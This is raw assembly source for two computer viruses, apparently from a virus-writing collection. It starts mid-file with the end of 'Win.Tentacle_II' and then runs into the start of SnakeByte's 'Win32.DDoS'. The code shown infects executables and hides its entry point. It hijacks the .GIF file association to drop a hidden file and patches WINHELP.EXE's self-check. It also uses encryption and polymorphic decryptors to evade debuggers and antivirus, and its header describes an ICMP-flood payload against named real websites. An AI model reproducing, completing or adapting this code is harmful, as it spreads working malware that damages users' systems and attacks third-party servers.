lea dx,[bp.tmp_filename] ; DS:DX=pointer to temp file name


mov ah,41h ; delete temp file
int 21h

clc ; clear carry flag (indicate success)


JMP exit_infect

close_tmp_file:
mov bx,[bp.dest_handle] ; BX=handle of temp file
mov ah,3Eh ; close temp file
int 21h

delete_tmp_file:
lea dx,[bp.tmp_filename] ; DS:DX=pointer to temp file name
mov ah,41h ; delete temp file
int 21h

close_file:
mov bx,[bp.source_handle] ; BX=handle of victim file
mov ah,3Eh ; close fictim file
int 21h

stc ; set carry flag (indicate error)

exit_infect:
popad ; restore all 32bit registers
RET

C_win311 db "C:\WIN311\", 0

; ----- GET DATE, TIME AND SIZE OF THE OPENED FILE --------------------------

get_file_date_time_size:
push cx ; save CX and DX
push dx

mov ax,5700h ; get date and time


int 21h

mov [bp.file_date],dx ; save date


mov [bp.file_time],cx ; save time

xor cx,cx ; CX:DX=0 (distance to move)


xor dx,dx
mov ax,4202h ; move filepointer relative to
int 21h ; end of file
; in DX:AX the new filpointer is
; returned (filesize in this case)

mov word ptr [bp.file_size+2],dx ; save filesize


mov word ptr [bp.file_size],ax

xor cx,cx ; DX:CX=0 (distance to move)


xor dx,dx
mov ax,4200h ; move filepointer relative to
int 21h ; beginning of file

pop dx ; restore DX and CX


pop cx

RET

C_win95 db "C:\WIN95\", 0

; ----- COPY ECX BYTES FROM VICTIM FILE TO TEMP FILE ------------------------

copy_file_block:
pushad ; save all 32bit registers
sub sp,256 ; allocate a 256 byte buffer from stack
mov [bp.bytes_to_copy],ecx ; save length of block to copy
mov dx,sp ; DX=offset buffer

copy_file_block_loop:
cmp [bp.bytes_to_copy],0 ; whole block moved?
JE copy_file_block_done ; then we're done
cmp [bp.bytes_to_copy],256 ; more than 256 bytes left?
JBE copy_remaining_bytes_block
mov cx,256 ; then just copy 256 bytes
JMP read_file_block

copy_remaining_bytes_block:
mov cx,word ptr [bp.bytes_to_copy] ; copy all bytes left

read_file_block:
push cx ; save size to read/write
mov bx,[bp.source_handle] ; BX=handle of source file
mov ah,3Fh ; read from file function
push ds ; save DS
push ss ; DS=SS
pop ds
int 21h

pop ds ; restore DS
mov bx,[bp.dest_handle] ; BX=handle of destination file
mov cx,ax ; write as many bytes as were read
mov ah,40h ; write block to temporary file
push ds ; save DS
push ss ; DS=SS
pop ds
int 21h

pop ds ; restore DS
cmp cx,ax ; sizes of read block=written block ?
pop cx ; restore size to read and write
JNZ copy_file_block_error ; if not equal, then an error occured
cmp cx,ax ; size of read/written block equal
; to the size we planned to read?
JNE copy_file_block_done ; if not, we're at the end of the file

cwde ; convert word to dword (AX->EAX)


sub [bp.bytes_to_copy],eax ; we've copied EAX bytes more
JMP copy_file_block_loop ; copy next file block

copy_file_block_error:
stc ; set carry flag (indicate error)
JMP copy_file_block_ret

copy_file_block_done:
clc ; clear carry flag (indicate success)
add sp,256 ; remove buffer from stack
popad ; restore all 32bit registers

copy_file_block_ret:
RET

; ----- SEARCH MODULE NAME --------------------------------------------------


;
; searches the module name pointed to by DX in the imported names table and
; returns in AX its number, otherwise indicates error with carry flag set

search_module_name:
push bx ; save BX
push es ; save ES

sub sp,256 ; reserve a 256 bytes buffer on stack


mov di,dx

push ss ; ES=SS
pop es

xor eax,eax ; EAX=0


mov ax,word ptr [bp.rw_buffer+28h] ; ptr to module-reference
; table (from NE header)
add eax,[bp.new_header_offs]; EAX=ptr to module-reference table
; (from file start)

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; set file pointer relative to
; file start to module reference table
int 21h
JC module_name_not_found

mov ah,3Fh ; read module reference table


mov cx,word ptr [bp.rw_buffer+1Eh] ; number of entries in
; module reference table
shl cx,1 ; multiply with two (each entry
; in module reference table is a word)
mov dx,sp ; DS:DX=ptr to our buffer on stack
int 21h
JC module_name_not_found

xor eax,eax ; EAX=0


mov ax,word ptr [bp.rw_buffer+2Ah] ; ptr to imported-names table
; (relative to NE header)
add eax,[bp.new_header_offs]; EAX=ptr to imported-names table
; relative to file start

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; set file pointer relative to
; file start to imported-names table
int 21h
JC module_name_not_found

mov ah,3Fh ; read imported-names table


mov cx,128 ; read 128 bytes
mov dx,sp ; DS:DX=ptr to buffer on stack
add dx,128 ; assume module-reference table is
; not longer than 128 bytes too
int 21h
JC module_name_not_found

mov bx,sp ; BX=module-reference table buffer


xor cx,cx ; CX=0
JMP check_if_all_modules_done

search_module_name_loop:
mov si,sp ; SI=buffer on stack
add si,128 ; SI=imported-names table buffer
add si,[bx] ; add offset from module-reference
; table to get a actual entry in the
; imported-names table

push cx ; save CX (module counter)


push di ; save DI (offset of module name
; to search for)

xor ch,ch ; CH=0


mov cl,[si] ; length of this entry in the
; imported-names table

inc cl ; also compare the string-length byte


cld ; clear direction flag
repe cmpsb ; compare the strings

pop di ; restore DI (offset of module name


; to search for)
pop cx ; restore CX (module counter)

JZ found_module_name
inc cx ; incerement CX (module counter)
add bx,2 ; go to next entry in module-
; reference table
check_if_all_modules_done:
cmp cx,word ptr [bp.rw_buffer+1Eh] ; done all modules ?
JNE search_module_name_loop ; if not, search on
JMP module_name_not_found ; if yes, the search failed

found_module_name:
mov ax,cx ; AX=module counter
inc ax ; make counter start from 1
add sp,256 ; remove buffer from stack
clc ; clear carry flag (indicate success)
JMP exit_search_module_name

module_name_not_found:
add sp,256 ; remove buffer from stack
stc ; Set carry flag

exit_search_module_name:
pop es ; restore ES
pop bx ; restore BX
RET

; ----- EPO ENGINE ----------------------------------------------------------


;
; Entry: none
;
; Exit:
; EAX - module index (in MSW) and API ordinal (in LSW) of found reloc item
; EDX - file offset of relocation item to modify

EPO:

; create the string 6, "KERNEL" in tmp_buffer

mov dword ptr [bp.tmp_buffer+4],5AD5762Dh


mov dword ptr [bp.tmp_buffer+0],0F220B44Bh
add dword ptr [bp.tmp_buffer+0],602496BBh
add dword ptr [bp.tmp_buffer+4],0A576CF21h
lea dx,[bp.tmp_buffer] ; DX=pointer to 6, "KERNEL"
CALL search_module_name
JC check_VBrun
mov dx,5Bh ; ordinal of InitTask API
JMP search_API_reference

check_VBrun:
; create the string 8, "VBRUN300" in tmp_buffer
mov dword ptr [bp.tmp_buffer+4],9062F740h
mov dword ptr [bp.tmp_buffer+0],0EDC4FE68h
mov byte ptr [bp.tmp_buffer+8],"0"
add dword ptr [bp.tmp_buffer+4],9FD05715h
add dword ptr [bp.tmp_buffer+0],647D57A0h
lea dx,[bp.tmp_buffer] ; Load effective addr
CALL search_module_name
JC end_EPO
mov dx,64h ; ordinal of THUNRTMAIN API

search_API_reference:
push ax ; save AX (module index)
push dx ; save DX (API function ordinal)

xor eax,eax ; EAX=0


mov ax,word ptr [bp.rw_buffer+22h] ; segment table offset
; (relative to NE header)
add eax,[bp.new_header_offs]; EAX=segment table offset (relative
; to file start)
xor ecx,ecx ; ECX=0
mov cx,word ptr [bp.rw_buffer+16h] ; entry code segment index
dec cx ; make segment counter start at zero
shl ecx,3 ; multiply with 8 (segment table
; entry size)
add eax,ecx ; EAX=offset of entry code segment
; descriptor (from filestart)
push eax ; CX:DX=EAX
pop dx
pop cx
mov ax,4200h ; go to descriptor of entry code segm
int 21h

pop dx ; restore DX (API function ordinal)


pop ax ; restore AX (module index)
JC end_EPO
mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignemt shift

push bp ; save BP (main data stack frame)


sub sp,size EPO_stack_frame ; create new data buffer on stack
mov bp,sp ; and set BP to it

push cx ; save CX (alignemt shift)


mov [bp.module_index],ax ; save module index
mov [bp.API_ordinal],dx ; save API function ordinal

mov ah,3Fh ; read entry code segment descriptor


mov cx,8 ; size of a segment descriptor
lea dx,[bp.entry_CS_offset] ; DS:DX=pointer to read buffer
int 21h
pop cx ; restore CX (alignment shift)
JC EPO_failed

xor edx,edx ; EDX=0


mov dx,[bp.entry_CS_offset] ; EDX=segment file offset (aligned)
shl edx,cl ; EDX=segment file offset (in bytes)
xor eax,eax ; EAX=0
mov ax,[bp.entry_CS_phys] ; EAX=segment physical size
add edx,eax ; EDX=file offset of segment relocs
mov [bp.entry_CS_relocs],edx; save it

push edx ; CX:DX=EDX


pop dx
pop cx
mov ax,4200h ; go to entry code segment relocations
int 21h
JC EPO_failed

mov ah,3Fh ; read number of relocation items


mov cx,2 ; read one word
lea dx,[bp.relocs_number] ; DS:DX=pointer to read buffer
int 21h
JC EPO_failed

xor ecx,ecx ; ECX=0


JMP check_if_all_relocs_done

search_API_reference_loop:
push cx ; save CX

mov ah,3Fh ; read a relocation item


mov cx,8 ; size of relocation item
lea dx,[bp.reloc_type] ; DS:DX=ptr to read buffer
int 21h

pop cx
JC EPO_failed

mov eax,dword ptr [bp.module_index] ; EAX=module index and


; API ordinal
cmp [bp.reloc_what],eax
JNE check_next_reloc
cmp word ptr [bp.reloc_type],103h ; check relocation type: must
; be 32bit far ptr and API ordinal
JE found_API_reference
check_next_reloc:
inc cx
check_if_all_relocs_done:
cmp cx,[bp.relocs_number]
JNE search_API_reference_loop
JMP EPO_failed

found_API_reference:
mov edx,[bp.entry_CS_relocs]
add edx,2
shl ecx,3 ; ECX=ECX*8 (size of a reloc item)
add edx,ecx ; EDX=offset of reloc item in file
mov eax,dword ptr [bp.module_index]; EAX=module index/API ordinal

add sp,size EPO_stack_frame ; clear buffer from stack


pop bp ; restore old stack frame pointer
clc ; clear carry flag (indicate success)
JMP end_EPO

EPO_failed:
add sp,size EPO_stack_frame ; clear buffer from stack
pop bp
stc ; set carry flag (indicate error)

end_EPO:
RET

gif_body:
include gif.inc ; the body of the gif file converted
; to DB instructions
gif_body_size EQU ($ - offset gif_body)
shell_open_command db "\SHELL\OPEN\COMMAND", 0
l_shell_open_command EQU ($ - offset shell_open_command)

; ----- PAYLOAD -------------------------------------------------------------

payload:
push es ; save ES
push bp ; save BP (main stack frame pointer)

sub sp,size payload_stack_frame ; reserve room on stack


mov bp,sp ; setup new stack frame

push ax ; save AX (what to do flag)

;* push dword ptr 1 ; HKEY_CURRENT_USER


db 66h,68h,1,0,0,0 ; fixup - byte match

mov word ptr [bp.reg_buffer2],"G."; name of the subkey: ".GIF",0


mov dword ptr [bp.reg_buffer2+2],"FI"
push ss ; push a far pointer to the name
lea ax,[bp.reg_buffer2] ; of the subkey
push ax

push ss ; push a far pointer to the buffer


lea ax,[bp.reg_buffer1] ; that will hold the return string
push ax

mov [bp.size_reg_buffer],40h; size of buffer for return string


push ss ; push a far pointer to the
lea ax,[bp.size_reg_buffer] ; dword that holds the size for the
push ax ; return string

CALL cs:RegQueryValue ; far call to the RegQueryValue API

or ax,ax ; zero means success


JZ RegQueryValue_success
pop ax ; clear stack
JMP exit_payload

RegQueryValue_success:
cmp byte ptr [bp.reg_buffer1],0; has it returned an empty string?
JE try_shell_open_command

push ss ; ES=SS
pop es

lea di,[bp.reg_buffer1] ; DI=offset retrun string


cld ; clear direction flag
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0

push ds ; save DS
push cs ; DS=CS
pop ds

mov si,offset shell_open_command


CALL decrypt_path ; decrypt & append it to the result
; of the RegQueryValue call
pop ds ; restore DS
CALL call_RegQueryValue
or ax,ax ; zero means success
pop ax ; restore AX (entry flag)
JZ RegQueryValue_success2

try_shell_open_command:
mov word ptr [bp.reg_buffer1],"G."
mov dword ptr [bp.reg_buffer1+2],"FI"

push ds ; save DS

push cs ; DS=CS
pop ds

push ss ; ES=SS
pop es

mov si,offset shell_open_command


lea di,[bp.reg_buffer1+4] ; Load effective addr
mov cx,l_shell_open_command ; useless, the decrypt_path procedure
; gets the string length itself.
CALL decrypt_path
pop ds ; restore DS
CALL call_RegQueryValue
or ax,ax ; zero means success
pop ax
JNZ exit_payload

RegQueryValue_success2:
; reg_buffer2 contains now the commandline of the program that is
; runned whenever the user doubleclics on a .GIF file

or ax,ax ; check the entry flag in AX


JZ restore_gif_commandline

push ss ; ES=SS
pop es
lea di,[bp.reg_buffer2] ; DI=pointer to commandline connected
; with .GIF files
push di ; save DI
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0
mov ax,di ; AX=end of string
pop di ; restore DI (start of string)
sub ax,di ; AX=length of string
mov cx,ax ; CX=length of string
mov al,"%" ; search the commandline for where
; the name of the gif will be on
; program start
cld ; clear direction flag
repne scasb ; search for the % sign
JNZ exit_payload ; if not found, exit payload
cmp byte ptr [di],"1" ; is it the %1, like it has to be?
JNE exit_payload ; if not, something is wrong
cmp byte ptr [di-2],'"' ; is there the quotes sign?
JNE dont_skip_quotes
dec di ; if yes, skip it
dont_skip_quotes:
dec di ; go to the start of the first
; parameter in the commandline, the
; name of the .GIF file

mov dword ptr [di+9],"G.EL" ; create there the "C:\TENTACLE.GIF"


mov byte ptr [di],"C" ; string
mov dword ptr [di+5],7E00FD39h
mov dword ptr [di+0Dh],"FI"
add dword ptr [di+5],0C5405715h
mov dword ptr [di+1],"ET\:"
push di ; save DI (offs of "C:\TENTACLE.GIF")
CALL call_RegSetValue ; set the new value.

; from now on, everytimes the user doubleclicks on a gif file, it


; will only see C:\TENTACLE.GIF ;-)

mov ah,3Ch ; create C:\TENTACLE.GIF file


mov cx,7 ; readonly,hidden,system attributes
pop dx ; DS:DX=ptr to filename to create
; ("C:\TENTACLE.GIF")
int 21h
JC exit_payload

mov bx,ax ; handle to BX

mov word ptr [bp.reg_buffer2+2],"8F" ; create GIF marker in the


mov word ptr [bp.reg_buffer2+0],"IG" ; buffer ("GIF87a")
mov word ptr [bp.reg_buffer2+4],"a7"

mov ah,40h ; write GIF marker


mov cx,6 ; size of gif marker
lea dx,[bp.reg_buffer2] ; DS:DX=pointer to write buffer
int 21h

mov ah,40h ; write gif file body


mov cx,gif_body_size ; size to write
mov dx,offset gif_body ; DS:DX=pointer to write buffer
push ds ; save DS
push cs ; DS=CS
pop ds
int 21h

pop ds ; restore DS

mov ah,3Eh ; close file


int 21h

JMP exit_payload ; payload is done

restore_gif_commandline:
push ss ; ES=SS
pop es
lea di,[bp.reg_buffer2] ; DI=pointer to commandline connected
; with .GIF files
cld ; clear direction flag
push di ; save DI
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0
mov ax,di ; AX=end of string
pop di ; restore DI (start of string)
sub ax,di ; AX=length of string
add di,ax
mov cx,ax ; CX=length of string
mov al," " ; search for the blank
std ; set direction flag
repne scasb ; search for the end of the filename
JNZ exit_payload ; if not found, exit
add di,2 ; go to 1st param (file to display)
cmp byte ptr [di],"C" ; is there "C:\TENTACLE.GIF"
JNE exit_payload ; if not, there's nothing to restore
cmp dword ptr [di+1],"ET\:" ; make really sure
JNE exit_payload
mov byte ptr [di],"%" ; restore the correct cmdline "%1"
mov word ptr [di+1],"1"
CALL call_RegSetValue ; set it.

exit_payload:
add sp,size payload_stack_frame ; free room on stack
pop bp ; restore BP (main stack frame ptr)
pop es ; restore ES
RET

call_RegQueryValue:
;* push dword ptr 1 ; HKEY_CURRENT_USER
db 66h,68h,1,0,0,0 ; fixup - byte match

push ss ; push a far pointer to the name


lea ax,[bp.reg_buffer1] ; of the subkey
push ax

push ss ; push a far pointer to the buffer


lea ax,[bp.reg_buffer2] ; that will hold the return string
push ax

mov [bp.size_reg_buffer],40h; size of buffer for return string


push ss ; push a far pointer to the
lea ax,[bp.size_reg_buffer] ; dword that holds the size for the
push ax ; return string

CALL cs:RegQueryValue ; far call to the RegQueryValue API

RET

call_RegSetValue:
;* push dword ptr 1 ; HKEY_CURRENT_USER
db 66h,68h,1,0,0,0 ; fixup - byte match

push ss ; push a far pointer to the name


lea ax,[bp.reg_buffer1] ; of the subkey
push ax

;* push dword ptr 0 ; REG_SZ (ASCIIZ string)


db 66h,68h,1,0,0,0 ; fixup - byte match

push ss ; push a far pointer to the buffer


lea ax,[bp.reg_buffer2] ; that will hold the return string
push ax

;* push dword ptr 0 ; size of value data


db 66h,68h,0,0,0,0 ; fixup - byte match

CALL cs:RegSetValue ; far call to the RegSetValue API

RET
; ----- PATCH WINHELP -------------------------------------------------------

patch_winhelp:
cmp word ptr [bp.rw_buffer+1Ch],2 ; number of segments
JB exit_patch_winhelp ; it's not the WINHELP.EXE
; we know, don't patch it

xor eax,eax ; EAX=0


mov ax,word ptr [bp.rw_buffer+22h] ; offset of segment table
; (relative to NE header)
add eax,[bp.new_header_offs] ; now relative to file start
;* add eax,8 ; go to 2nd segment descriptor
db 66h, 83h,0C0h, 08h ; fixup - byte match

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; set filepointer to the
int 21h ; descriptor.

mov ah,3Fh ; read the aligned segment file offset


mov cx,2 ; read one word
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to read buffer
int 21h

xor eax,eax ; EAX=0


mov ax,word ptr [bp.tmp_buffer] ; EAX=aligned segment file offset
mov cl,byte ptr [bp.rw_buffer+32h] ; CL=alignment shift
shl eax,cl ; EAX=segment file offset in bytes
;* add eax,22h ; go to offset 22h in 2nd segment
db 66h,83h,0C0h,22h ; fixup - byte match

push eax ; CX:DX=EAX


pop dx
pop cx
mov ax,4200h ; set filepointer to offset 22h in
int 21h ; the second segment
JC exit_patch_winhelp

mov ah,3Fh ; read two bytes of program code


mov cx,2 ; size to read
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to read buffer
int 21h
JC exit_patch_winhelp

cmp word ptr [bp.tmp_buffer],1474h ; is it a JE $+16h ?


JNE exit_patch_winhelp ; if not, it's not the WINHELP.EXE
; we know, don't patch it.

mov ax,4201h ; set filepointer back to the


; conditional jmp
mov cx,-1 ; CX:DX=-2
mov dx,-2
int 21h

mov byte ptr [bp.tmp_buffer],0EBh ; a unconditional JMP SHORT

mov ah,40h ; patch the file with the


; unconditional JMP
mov cx,1 ; write one byte
lea dx,[bp.tmp_buffer] ; DS:DX=pointer to the write buffer
int 21h

; WINHELP.EXE now has no self-check


; any more ;-)

exit_patch_winhelp:
RET

db 3 dup(0) ; maybe the author wanted the


; relocation addresses on an address
; divisible by 4 ?

RegQueryValue dd 0000FFFFh
RegSetValue dd 0000FFFFh
org_entry dd 0000FFFFh

virus_end:

; Most data of the virus is stored in a buffer on the stack. The following
; structure represents the lay-out of this stack frame:

stack_frame struc
dta db 2Bh dup(?)
tmp_buffer db 10 dup(?)
bytes_to_copy dd ?
full_filename db 24 dup(?)
full_filespec db 24 dup(?)
tmp_filename db 16 dup(?)
source_handle dw ?
dest_handle dw ?
file_date dw ?
file_time dw ?
file_size dd ?
new_header_offs dd ?
end_of_NE_hdr dd ?
alignment_unit dd ?
first_segm_offs dd ?
new_sect_descr dw 4 dup(?)
rw_buffer db 64 dup(?)
dw ?
our_reloc_offs dd ?
module_ordinal dd ?
new_entry_CS dw ?
new_entry_IP dw ?
stack_frame ends

; The data that is used in the EPO engine of the virus uses another stack
; frame that is represented in this structure:

EPO_stack_frame struc
entry_CS_offset dw ?
entry_CS_phys dw ?
entry_CS_flags dw ?
entry_CS_virt dw ?
reloc_type dw ?
reloc_offs dw ?
reloc_what dd ?
module_index dw ?
API_ordinal dw ?
entry_CS_relocs dd ?
relocs_number dw ?
EPO_stack_frame ends

; Also the payload routine uses its own stack frame:

payload_stack_frame struc
reg_buffer1 db 40h dup(?)
reg_buffer2 db 40h dup(?)
size_reg_buffer dd ?
payload_stack_frame ends

first_gen_entry:
push ds ; save DS
pusha ; save all registers

push ss ; DS=SS
pop ds

sub sp,size stack_frame ; reserve room on stack


mov bp,sp ; setup stack frame

mov ah,1Ah ; set DTA to DS:DX


lea dx,[bp.dta] ; Load effective addr
int 21h

mov si, offset exe_wildcard ; encrypt all the strings in the


call encrypt_wildcard ; virus by a simple inc/dec
mov si, offset scr_wildcard ; algorithm
call encrypt_wildcard

mov si, offset C_win


call encrypt_path
mov si, offset C_windows
call encrypt_path
mov si, offset C_win31
call encrypt_path
mov si, offset C_win311
call encrypt_path
mov si, offset C_win95
call encrypt_path
mov si, offset shell_open_command
call encrypt_path

mov bx,0FFFFh
mov cx,offset empty_string
mov dx,offset exe_wildcard
CALL infect_directory ; infect all EXE files in current dir

mov ah,9
mov dx,offset first_gen_message
int 21h

mov ax,4C00h
int 21h

first_gen_message db "Win.Tentacle_II virus dropped", 0Dh, 0Ah, "$"

end first_gen_entry
;
; ***************************************************************************
; -----------------[ Win32.DDoS by SnakeByte { KryptoCrew } ]----------------
; ***************************************************************************
;
;
;
; Please note that it is illegal to spread viruses, so if you compile this
; code, just test it on a closed system and don't place it in the wild !
; I am not responsible for your actions .. as always ;)
;
;
;
;
; This is the first Windows Virus I've written so far, and some parts are from
; Win32.Aztec by Billy Beleceb, because at the time i wrote this thing, not everything
; was clear in my mind, as it is now, hope I can present you some better things from me
; in the future.
;
; This is also my first polymorphic virus ever ;) so don't expect too much from the
; poly engine. I did not understand much of the code from other poly engines, but
; now, after coding one on my own, I do, so I maybe can code a better one the next time ;)
;
; The first layer is nearly completely polymorphic. I use junk opcodes like mov, add ...
; and try to keep track that they don't look completely useless.
; I also use several ways to decrypt the virus ( xor, neg, not .. ) and
; several methods to do the loop. The size will always be in ECX and
; the start in ESI, but i use several methods to put the values inside
; the registers so there is nothing static.
; The only static thing left is the call to the polymorphic decryptor ;(
;
;
; I was just able to test this thing on a Win95 PC, so I don't know if it will
; work on other systems, but I think it will. Two friends made some tests under
; NT and 2k with a beta, and it worked, so I hope this final version will also do.
;
;
; It tries to get the 4 following API's:
;
; - Kernel32.dll <- the only one we really need to work, the others are for fun
;
; - Imagehlp.dll <- try to create a valid CRC for the PE-Header of infected files
; - Advapi32.dll <- get some data from the registry
; - Winsck32.dll <- Payload : Ping-flood a server
;
;
;
;
; What does this Virus do :
;
; - 1.st Generation infects just the current directory ( easier to infect just some files
*eg* )
; - Get's API's with LoadLibraryA & GetProcAddress
; - Tries to load ImageHlp.dll to create checksums with the CheckSumMappedFile Function
; - Infects the current, the windows and the system directory and parses some
; random directory's on drive C:
; - Follows LNK - Files ( does not work with NT / 2k )
; - Removes and restores File-Attributes
; - Parses Drive C:, enters a folder with a chance of 1 to 3
; - Retrieves the Startmenue from registry and parses it ( follows LNK-Files there )
; - If everything runs well it will infect 100 files all over the disk
; - Generates a polymorph decryptor which will be used for all files infected in one run
; - Uses 2 layers of decryption ( 1st is poly, 2nd is harder to debug / emulate )
; - Does not infect files smaller than 40 kb
; - Will not infect files with AV, AN or DR in the filename
; - Payload is a icmp flood on one of these servers :
;
; Sunday = www.bundesnachrichtendienst.de
; Monday = French Secret Service ( dgse.citeweb.net )
; Tuesday = www.avp.com ( AV )
; Wednesday = www.lockdown2000.com
; Thursday = www.f-secure.com
; Friday = www.norton.com
; Saturday = www.zonelabs.com
;
; *# Please note that i choose these servers because I think they can #*
; *# handle such an attack, if any idiot would release this into the wild. #*
;
;
;
;
;
;
; To make this code working use TASM 5.0 and pewrsec.
;
;
;
;
;
;
; Thanks and greetz fly to these people:
;
; Billy Beleceb - Your Win32 VWG is just great ..
; ( you'll find some of your code [Win32.Aztec] here ;)
; Evul - Thanks for hosting my site at coderz.net
; Ciatrix - Hope you carry on your good work with VDAT !
; SnakeMan - Hope you get more entrys *g* --> http://altavirus.cjb.net
; PhilippP - Thanks for the thrilling test in 2k .. ;)
; BumbleBee - Still thinking of Sex ?
; diediedie - Thnx for demotivating me... :)
; asmodeus - nice beginner lesson in poly ;)
; darkman - just believe me: the question was stupid ;)
;
;
;
;
;
; ***************************************************************************
; ---------------------------[ Here we start ]-------------------------------
; ***************************************************************************

.586p
.model flat
jumps ; Jumps get calculated
; ( I know not good for optimizing.. )
.radix 16 ; All numbers are Hexadecimal
; I once searched for a forgotten 'h'
; 2 weeks until I found this bug.. :P

; some API's
extrn ExitProcess:PROC ; fake host for 1. Generation

extrn MessageBoxA:PROC ; For testing purposes ( no longer needed )


; but i needed it for error-detection *g*
; 'cause I am too stupid to work with softice.. :(
.data ; fake data for TASM
db ? ; otherwise TASM would not compile this
; we store all our data in the code
; section, that's why we need to use
; pewrsec after compiling, to set the
; code section flags to write !

; some constants I don't want to calculate on my own *g*


VirusSize equ (offset VirusEnd - offset Virus )
CryptSize equ (offset VirusEnd - offset CryptStart )
NoCrypt equ (offset CryptStart - offset Virus )
FirstLSize equ (offset VirusEnd - offset FirstLayerStart )
Buffersize equ (offset EndBufferData - offset VirusEnd )

FILETIME STRUC
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ENDS

.code

; ***************************************************************************
; -------------[ Delta Offset and searching for the Kernel Addy ]------------
; ***************************************************************************

Virus: ; Here we go

call PDecrypt ; call the poly decryption routine


; which is located at the end of virus
; just a simple 'ret' in the first generation

FirstLayerStart: ; here starts the first layer


; everything will be crypted from here on

call Delta ; let's get the delta - offset

Delta:
mov ebp, offset Delta ; I want to do this a bit different
neg ebp ; than usual, who knows, maybe this
pop eax ; fools some bad heuristics
add ebp, eax

or ebp, ebp ; we don't need to decrypt the 1.


jz CryptStart ; Generation

; save esp
mov dword ptr [ebp+XESP], esp

mov ecx, (CryptSize / 2) ; the lenght of crypted part in words


mov dx, word ptr [ebp+Key]
lea esp, [ebp+CryptStart] ; set esp to the start of the decrypted part

DeCryptLoop: ; let's decrypt the virus


pop ax ; we pop the body word by word
inc dx ; this method fucks with debuggers, who
xchg dl, dh ; trace with int 1h ( destroys stack )
xchg al, ah
xor ax, dx
not ax
push ax
add esp, 2h
loop DeCryptLoop
; restore esp
mov esp, dword ptr [ebp+XESP]

jmp CryptStart ; start virus

Key dw 0h ; our key


XESP dd 0h ; we save the esp here

db 4 dup (90h) ; some nop's so we will not jump into a instruction


; ( happened sometimes during testing :( )
; because of the prefech queue buffer ( or whatever this is
spelled .. )
CryptStart:
; we save these two values ( EIP & Imagebase )
; to be able to return to the original host..
mov eax, dword ptr [ebp+OldEIP]
mov dword ptr [ebp+retEIP], eax
mov eax, dword ptr [ebp+OldBase]
mov dword ptr [ebp+retBas], eax

mov eax, dword ptr fs:[0] ; save the original SEH


mov dword ptr [ebp+SEH_Save], eax

mov esi, [esp] ; let's get the return address of the Create Process API
xor si, si ; round it to a full page

push dword ptr [ebp+Error_ExecuteHost]


mov fs:[0], esp ; set new SEH

call GetKernel ; try to get it


jnc GetApis ; If got it we try to retrieve the API's

; Otherwise, we try to check for


; the kernel at some fixed addresses
; But the way above should work most
; of the times.. :)

mov esi, 0BFF70000h ; try the Win95 Kernel Addy


call GetKernel
jnc GetApis

mov esi, 077F00000h ; try the WinNT Kernel Addy


call GetKernel
jnc GetApis

mov esi, 077e00000h ; try the Win2k Kernel Addy


call GetKernel
jnc GetApis
; if we still did not found the
jmp Error_ExecuteHost ; kernel we stop the virus
; and execute the goat

; ***************************************************************************
; -------------------------[ let's get the API's ]---------------------------
; ***************************************************************************

; These are the 2 API's we search in the Kernel


; we need them to get all the others API's
; I prefer LoadLibraryA to GetModuleHandle,
; because it is no longer nessecairy, that the
; file we infect loads the dll files we need,
; we load them on our own,... ;)
; This means, we can use almost any API we want to *eg*
; LoadLibraryA also returns the Module-Handle, but
; if it is not loaded it loads it ... bla.. ;P

LL db 'LoadLibraryA', 0h ; we need these API's for searching..


GPA db 'GetProcAddress', 0h

GetApis: ; Offset of the Kernel32.dll PE-Header is in EAX

mov [ebp+KernelAddy], eax ; Save it


mov [ebp+MZAddy], ebx

lea edx, [ebp+LL] ; Points to name of the LoadLibaryA - API


mov ecx, 0Ch ; Lenght of Name
call SearchAPI1 ; search it..
mov [ebp+XLoadLibraryA], eax
; Save the Addy

xchg eax, ecx ; If we didn't get this API or the other one, we quit !
jecxz ExecuteHost ; thnx to Billy ;)

lea edx, [ebp+GPA] ; Points to name of the GetProcAddress - API


mov ecx, 0Eh ; Lenght of Name
call SearchAPI1
mov [ebp+XGetProcAddress], eax
; Save the Addy

xchg eax, ecx ; check if we failed


jecxz ExecuteHost ; ( thnx again, nice way of optimization *g* )

; Now we have our 2 nessecairy API's


jmp GetAPI2 ; and are able to get the others
; Yes I know this jmp is not very optimizing.. ;)
; But storing the data here helps me understanding
; my code *bg*

; this dll is delivered with every version


KERNEL32 db 'Kernel32',0 ; of windows, so we will get it always ( ..most likely *g* )
; the virus relies on it

IMAGEHLP db 'Imagehlp',0 ; this dll is not nessecairily needed, but dll's will
; only get infected, if we are able to use the CheckSumMappedFile
; Function from this dll to create a checksum
; it is delivered with win9x, NT and several compilers.

ADVAPI db 'advapi32',0 ; this dll is neccessairy to retrieve the startmenue folder


; from registry, so we are able to follow the shortcuts there

WSOCK db 'wsock32.dll',0
; we need this one here to perform a ping
; ( not needed for the virus, but the payload )

GetAPI2: ; We get them, by grabbing the handles of


; different DLL's first and use GetProcAddress
; to locate the API's itself

; Let's get the Handles by calling


; the LoadLibrary API.. :)
; if we fail to get the
; Kernel32, we execute the
; original host
lea eax, [ebp+KERNEL32]
push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+K32Handle], eax
test eax, eax
jz ExecuteHost

lea eax, [ebp+IMAGEHLP]


push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+IHLHandle], eax

lea eax, [ebp+ADVAPI]


push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+ADVHandle], eax

lea eax, [ebp+WSOCK]


push eax
call dword ptr [ebp+XLoadLibraryA]
mov [ebp+W32Handle], eax

lea esi, [ebp+Kernel32Names]


lea edi, [ebp+XFindFirstFileA]
mov ebx, [ebp+K32Handle]
push NumberOfKernel32APIS
pop ecx
call GetAPI3

lea esi, [ebp+ImageHLPNames]


lea edi, [ebp+XCheckSumMappedFile]
mov ebx, [ebp+IHLHandle]
xor ecx, ecx
inc ecx
